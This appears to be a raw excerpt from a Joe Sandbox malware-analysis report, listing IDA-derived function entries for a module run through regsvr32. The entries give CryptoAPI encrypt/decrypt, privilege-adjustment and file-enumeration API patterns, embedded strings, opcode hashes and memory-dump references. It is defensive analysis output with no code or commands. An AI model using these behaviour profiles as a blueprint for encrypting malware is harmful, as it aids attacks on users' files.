                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Crypt$Context$DestroyHash$AcquireEncryptRelease$CreateDataDeriveImportRandom_fread_nolock
                                                                                                                • String ID: @$Microsoft Enhanced Cryptographic Provider v1.0$u
                                                                                                                • API String ID: 2427540687-1418344745
                                                                                                                • Opcode ID: 3ac9ef445a7e533637a658a49cdaba0b4aa2f385d9f408c52e86d3762beffbe2
                                                                                                                • Instruction ID: 100f67f87428459855ccab45a6b0d50509d5572638fdcd1a68469e3cbc202b5e
                                                                                                                • Opcode Fuzzy Hash: 3ac9ef445a7e533637a658a49cdaba0b4aa2f385d9f408c52e86d3762beffbe2
                                                                                                                • Instruction Fuzzy Hash: C2917972B1864186EB10DFA1E454BAA77A0FBC4784F844039EE8E97B58DF7CE549CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Crypt$Context$DestroyHash_fread_nolock$AcquireDecryptRelease$CreateDataDeriveImport_invalid_parameter_noinfo
                                                                                                                • String ID: @$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                • API String ID: 1281859089-3585394877
                                                                                                                • Opcode ID: df8c863f1cf3d4f0c18344a008a4b550c95367f196f2804c15b1e520c1b50b60
                                                                                                                • Instruction ID: b11bf0f2f5c2a879dc4684b821d88b483bec27f8a7af1c9141683df20ea07442
                                                                                                                • Opcode Fuzzy Hash: df8c863f1cf3d4f0c18344a008a4b550c95367f196f2804c15b1e520c1b50b60
                                                                                                                • Instruction Fuzzy Hash: 0281767261868186EB20DFA1E454FAA77A5FBC4784F844035EE8E97B58DF7CE509CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo$UT
                                                                                                                • API String ID: 0-715829385
                                                                                                                • Opcode ID: 8c7fb053e7aeb3b17acc237b9fbb7f9691bb80a753e70374dd642a27f528e31c
                                                                                                                • Instruction ID: 6555397ae021a2b1ba2e71b2564db6265e1c3bf31c5f87f7b955804058fbc113
                                                                                                                • Opcode Fuzzy Hash: 8c7fb053e7aeb3b17acc237b9fbb7f9691bb80a753e70374dd642a27f528e31c
                                                                                                                • Instruction Fuzzy Hash: 4052A3A2A0878289E761CF68D4407BD37A1FB45B88F984039DA4E9B795DFBCF548C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File$Write_invalid_parameter_noinfo_noreturn$CloseHandle$CountPointerReadTick
                                                                                                                • String ID: 1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735$>>
                                                                                                                • API String ID: 672358132-3303638204
                                                                                                                • Opcode ID: ca706e9c69f227370a74179568b4a23ed18432dbf278796383ee53ccce1533e9
                                                                                                                • Instruction ID: e08c53ad2d13cc5527cff3341ff93a4dd7cb4335b8cee48c25a2152c30c92b17
                                                                                                                • Opcode Fuzzy Hash: ca706e9c69f227370a74179568b4a23ed18432dbf278796383ee53ccce1533e9
                                                                                                                • Instruction Fuzzy Hash: 8E02F1B2B146818AEB04CBB5D454BAD33E1FB89784F844139DE4EAB799DE7CE449C310
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseCreateHandleThread$Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1970207563-0
                                                                                                                • Opcode ID: 0ae320eb1c64685204bdc4c1a2d68490e6e8ad8e35a24628bf2fb8a78407d72e
                                                                                                                • Instruction ID: 8a89e22387ba10c9d23689d352406a47783e7e4e33fc8eca4130a232f5306b1e
                                                                                                                • Opcode Fuzzy Hash: 0ae320eb1c64685204bdc4c1a2d68490e6e8ad8e35a24628bf2fb8a78407d72e
                                                                                                                • Instruction Fuzzy Hash: 8F41B1E290964283E714EFA1A459BB923A5FF48794FC8453DE94EAB695CF7CF148C200
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Alloc$ErrorHeapLast$Free$Process$AllocateInfoNativeSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 311326083-0
                                                                                                                • Opcode ID: f1cdf27b50a543ee295e9b25e8c14b3811a35c2eccdc1db56335470b02b29c2f
                                                                                                                • Instruction ID: c7810ebd31bafeb6cd80ffb2dfd964067ab86503b377dbfa8fc3c8e2b3bc8c14
                                                                                                                • Opcode Fuzzy Hash: f1cdf27b50a543ee295e9b25e8c14b3811a35c2eccdc1db56335470b02b29c2f
                                                                                                                • Instruction Fuzzy Hash: A9E1AFB2B1564186EB24DFA1D650B7973A5FB48B84F884438DA4EABB40DF7CF459C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                • Opcode ID: 107f43838dd47a772ed0d66cbca8b36dc9ee8a504dc2acb411d4a3ac4dd591a0
                                                                                                                • Instruction ID: f459ef3aa3efdfafbcebad3f714893229efab4c8cae3e2e603338b11eb519a24
                                                                                                                • Opcode Fuzzy Hash: 107f43838dd47a772ed0d66cbca8b36dc9ee8a504dc2acb411d4a3ac4dd591a0
                                                                                                                • Instruction Fuzzy Hash: 97B2B7F2A191828FE765CEA5D540FF937A1FB44348F985139DA0BA7B84DBB8B548C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 5.06%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo$_fread_nolock
                                                                                                                • String ID: 5691c606f068ee66f2b65d8c89de9f993ac27705dbd55f5b
                                                                                                                • API String ID: 3619505198-66563769
                                                                                                                • Opcode ID: cfcd957a260f216062818d6d8a99835869a951549a8f165fcb4f7eb9a47190b9
                                                                                                                • Instruction ID: 8afb2e23433412bbf3323bee35d2a267d03170413eb97a3ffc0ea7d7f95fdc01
                                                                                                                • Opcode Fuzzy Hash: cfcd957a260f216062818d6d8a99835869a951549a8f165fcb4f7eb9a47190b9
                                                                                                                • Instruction Fuzzy Hash: 2142C2A2B1474185EB00DBA5D444BAD2361FB457A8F945239EE2E6BBD9DFBCE049C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735, xrefs: 00007FF983D997BB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File_invalid_parameter_noinfo_noreturn$Read$CloseHandle$Write
                                                                                                                • String ID: 1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735
                                                                                                                • API String ID: 4279757298-3815716874
                                                                                                                • Opcode ID: 8b1e56d16c13cf912fc946bd3b9e94057cc47bcbb687c3d4d16fb0d11a83946c
                                                                                                                • Instruction ID: 2f487c2738df7addf5b4c16165c5e693fa16461e37d085a887db55bdb874b3e0
                                                                                                                • Opcode Fuzzy Hash: 8b1e56d16c13cf912fc946bd3b9e94057cc47bcbb687c3d4d16fb0d11a83946c
                                                                                                                • Instruction Fuzzy Hash: 77E1E9B2B1468185EB00DFA5E4447AE37A1FB45798F844139DE5EA7B99DFBCE048C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 61a50ee86d5169f861ea6d984ef250ec32f2b8353a1e10b8ab2833c2e07740c9, xrefs: 00007FF983D929FC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastProcessToken_invalid_parameter_noinfo_noreturn$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                • String ID: 61a50ee86d5169f861ea6d984ef250ec32f2b8353a1e10b8ab2833c2e07740c9
                                                                                                                • API String ID: 3248160585-2762331935
                                                                                                                • Opcode ID: fea1cafa03c454daab4362a1ddf5f1b8b2872c5ee5d5667a273a23862cb6609d
                                                                                                                • Instruction ID: 3017ef7f0be8ba50c541df2c61334f52c4726116b0f318e042369fd49e2595a7
                                                                                                                • Opcode Fuzzy Hash: fea1cafa03c454daab4362a1ddf5f1b8b2872c5ee5d5667a273a23862cb6609d
                                                                                                                • Instruction Fuzzy Hash: B04198B2A18786C2EB10CF94F44476DA3A1FB84794F945139DA9D976A9DFBCF048C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Find$CloseFileFirst
                                                                                                                • String ID: >> $\
                                                                                                                • API String ID: 422238183-1673512177
                                                                                                                • Opcode ID: 909e8305dac6507894ea191d9e1c780f4f4c2329533fc2a8ac428fc02089b329
                                                                                                                • Instruction ID: 8f8647330ba09bf1cda484a0b6007e9acaa39c9c57a19674d813890c87b009db
                                                                                                                • Opcode Fuzzy Hash: 909e8305dac6507894ea191d9e1c780f4f4c2329533fc2a8ac428fc02089b329
                                                                                                                • Instruction Fuzzy Hash: 2702D3A2A08B8085EB00CBA4E44076E77B1FB85B94F544239DB9D5B7D9DFBCE498C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                • String ID: ?
                                                                                                                • API String ID: 435049134-1684325040
                                                                                                                • Opcode ID: b32b4a40576fd4a6b3fbcefa2f4a0ee36ce083ebf6697984aa655ae6f0be1c7c
                                                                                                                • Instruction ID: 91cb9c4910a16b98ea4f54fdf8b8a43a3a480d3caa5f0eafeb8c2956e40aa75d
                                                                                                                • Opcode Fuzzy Hash: b32b4a40576fd4a6b3fbcefa2f4a0ee36ce083ebf6697984aa655ae6f0be1c7c
                                                                                                                • Instruction Fuzzy Hash: 13D1C0A2A082468BE750DFA19441BB93B90FB44794FC86539EA4FE7696CF7CF449C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 16.53%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8, xrefs: 00007FF983D9131D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InfoNativeSystemVersion
                                                                                                                • String ID: d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8
                                                                                                                • API String ID: 2296905803-2598894011
                                                                                                                • Opcode ID: ba4b7919b10e4de7279c42c6f33d4ef792b1b49a38aeef2924089d27d7593ea7
                                                                                                                • Instruction ID: a8dc1c86787f941233dcb2cbde4e39f3e44f9d15396eadfd3c7877a666e353d1
                                                                                                                • Opcode Fuzzy Hash: ba4b7919b10e4de7279c42c6f33d4ef792b1b49a38aeef2924089d27d7593ea7
                                                                                                                • Instruction Fuzzy Hash: 3D41CA62A187C181E610DB65F48476E73A1FB857D0F945139EA8DA3BA9DF7CF184C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$ByteCharFirstMultiNextWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 2913819974-0
                                                                                                                • Opcode ID: 7948592e4fa59f7eb08c5e3b56543b33a91ef88a81cedeaff0f27df06a57ad09
                                                                                                                • Instruction ID: 97bc5cee2eef512befdfec5772990af1cfc2e311d7bb4dadda9493d7bc929b17
                                                                                                                • Opcode Fuzzy Hash: 7948592e4fa59f7eb08c5e3b56543b33a91ef88a81cedeaff0f27df06a57ad09
                                                                                                                • Instruction Fuzzy Hash: 6AD1A1A661968195EB21DF64C451BFA73B0FB44B44FC8903AD64E9B684EF7CE24DC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 1405656091-0
                                                                                                                • Opcode ID: b1158d2bc6066d46eac873c6fdbe1d47e665daa6a48f767a0990f346a00cf09b
                                                                                                                • Instruction ID: 30dc78403f07cee2caedb649577e425d8024911f2f4d480621905225042fc2e1
                                                                                                                • Opcode Fuzzy Hash: b1158d2bc6066d46eac873c6fdbe1d47e665daa6a48f767a0990f346a00cf09b
                                                                                                                • Instruction Fuzzy Hash: 0281C5F2B042464BDB58CFB5C941BA83695FB54788F889039EA0EDA789EE7CF505C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 23.02%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1239891234-0
                                                                                                                • Opcode ID: 2f607030710425d66146b00b3c78e4c22e2448df10010c97ea769bd7889ac1ef
                                                                                                                • Instruction ID: 6bc6c202a87dc57c41e64383ea8f288c0aab0b895460abf47b4c515586bce66a
                                                                                                                • Opcode Fuzzy Hash: 2f607030710425d66146b00b3c78e4c22e2448df10010c97ea769bd7889ac1ef
                                                                                                                • Instruction Fuzzy Hash: 7A318376618B8186DB60CF64E8407BD73A4FB88758F940139EA8E97B94DF7CE549CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.46%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$FreeHeapInformationTimeZone
                                                                                                                • String ID: ?
                                                                                                                • API String ID: 428190724-1684325040
                                                                                                                • Opcode ID: ae696e860ac90aa5f27092f9e6873c23f362dc8221ada7b35dd661594edec3da
                                                                                                                • Instruction ID: a0bf641d6fb8905d5c0ed3b35d27892b853fb4a07bc55d93874116b99cf71ee8
                                                                                                                • Opcode Fuzzy Hash: ae696e860ac90aa5f27092f9e6873c23f362dc8221ada7b35dd661594edec3da
                                                                                                                • Instruction Fuzzy Hash: 7D61AFB2A0864287E760DF61E840BA976A4FB44794FC81139EA4EE3A95DF7CF449C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 16.53%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite$Console
                                                                                                                • String ID:
                                                                                                                • API String ID: 786612050-0
                                                                                                                • Opcode ID: 7807529073b691e6cdb393a9a913506459aaaee20116e96a684b7cbd462e4bfe
                                                                                                                • Instruction ID: f0b8f2a73fe9d177cecbaf8474f4b3675a9ef3aaa0dc8a309edf2eccc43bb009
                                                                                                                • Opcode Fuzzy Hash: 7807529073b691e6cdb393a9a913506459aaaee20116e96a684b7cbd462e4bfe
                                                                                                                • Instruction Fuzzy Hash: 1BD106B2B08A819AE741CFA4D5447ED77B1FB44788B994139DE4F97B89DE78E01AC300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 23.02%
